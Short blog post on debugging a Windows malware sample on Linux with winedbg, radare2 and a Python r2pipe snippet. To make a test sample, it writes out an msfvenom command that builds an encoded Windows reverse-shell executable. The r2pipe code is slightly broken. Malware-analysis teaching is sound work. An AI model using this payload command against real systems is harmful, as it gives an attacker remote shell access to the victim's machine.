Dynamic win32 malware analysis on Linux

Jose Ramon Palanco Jose Ramon Palanco Follow Feb 24, 2019 · 1 min read
Dynamic win32 malware analysis on Linux
Share this

Sometimes we don’t have a Windows machine for analyzing a malware sample. If the sample is very simple and is not interacting much with the operating system, we can use Linux.

First we will create a pretty simple PE file using metasploit, this will create a reverse shell on 31337 port at localhost. :

msfvenom -a x86 --platform windows -p windows/shell/reverse\_tcp \\
LHOST= LPORT=31337 -b "\\x00" -e x86/shikata\_ga\_nai -f exe -o /tmp/1.exe

Now we have a sample we will use wine debugger pausing the sample:

winedbg --gdb --no-start /tmp/1.exe

Pretty simple, right? We can now connect to to the gdb socker using gdb, but in our case we will use radare2:

r2 -d -a x86 -b 32 gdb://localhost:55193

Now we have a radare2 session, but we can automate our analysis using r2pipe and your favorite language, in my case python. Just remember to use json ”cmdj” output in your commands so it will be easy to parse.

import r2pipe
r2 = ('gdb://',
                     \['-d', '-a x86', '-b 32',
                      '-e dbg.exe.path=/tmp/1,exe'\])

function\_list = r2.cmdj("aflj")
# ...
# ...


Happy malware reversing!!

Jose Ramon Palanco
Written by Jose Ramon Palanco Follow
Jose Ramón Palanco founded Dinoflux at 2014, a Threat Intelligence startup acquired by Telefonica, currently he works for 11paths since 2018. He worked also for Ericsson at R&D department and Optenet (Allot). He studied Telecommunications Engineering at the University of Alcala de Henares and Master of IT Governance at the University of Deusto. He has been a speaker at OWASP, ROOTEDCON, ROOTCON, MALCON, and FAQin... He has published several CVE and different open source tools for cybersecurity like nmap-scada, ProtocolDetector, escan, pma, EKanalyzer, SCADA IDS, ...